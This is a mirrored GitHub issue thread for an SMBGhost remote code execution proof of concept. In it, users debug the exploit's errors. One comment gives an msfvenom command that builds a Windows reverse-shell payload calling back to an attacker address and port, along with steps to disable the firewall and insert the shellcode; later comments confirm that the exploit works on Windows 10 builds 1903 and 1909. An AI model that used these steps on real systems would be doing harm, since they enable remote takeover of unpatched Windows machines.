Git Product home page Git Product logo

Comments (8)

895515845 avatar 895515845 commented on June 4, 2024

I have this problem,so what should I do

from smbghost_rce_poc.

0xFF1E071F avatar 0xFF1E071F commented on June 4, 2024

I have this problem,so what should I do

Unfortunately i couldn't find a solution yet :/

from smbghost_rce_poc.

chompie1337 avatar chompie1337 commented on June 4, 2024

nvm, it's a bug. i changed the hal heap search and forgot to update that case. will post a fix shortly

from smbghost_rce_poc.

chompie1337 avatar chompie1337 commented on June 4, 2024

fix for this error has been pushed

from smbghost_rce_poc.

0xFF1E071F avatar 0xFF1E071F commented on June 4, 2024

Thank you i have another error now:

python exploit.py -ip 192.168.100.146
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7e380000000
[+] found PML4 self-ref entry 149
[+] found HalpInterruptController at fffff7e3800015b8
Traceback (most recent call last):
  File "exploit.py", line 465, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 428, in do_rce
    search_hal_heap(ip, port)
  File "exploit.py", line 356, in search_hal_heap
    PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0]
struct.error: unpack requires a buffer of 8 bytes

from smbghost_rce_poc.

0xFF1E071F avatar 0xFF1E071F commented on June 4, 2024

OK ppl, if you are reading this dont forget to

  1. close won 10 b1903/1909 firewall
  2. run msfvenom as:
    msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.113.121 LPORT=31337 -f python and change the USER_PAYLOAD with this shellcode.

This code now works on b1903.

And i cannot make it exploit on 1909 machines.

from smbghost_rce_poc.

0xFF1E071F avatar 0xFF1E071F commented on June 4, 2024

Ok, when i use the exploit on b1909 machines, python code works normally (i mean no error output). But the b1909 machine crashes and reboots.

from smbghost_rce_poc.

0xFF1E071F avatar 0xFF1E071F commented on June 4, 2024

now works on 1909 thanks

from smbghost_rce_poc.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.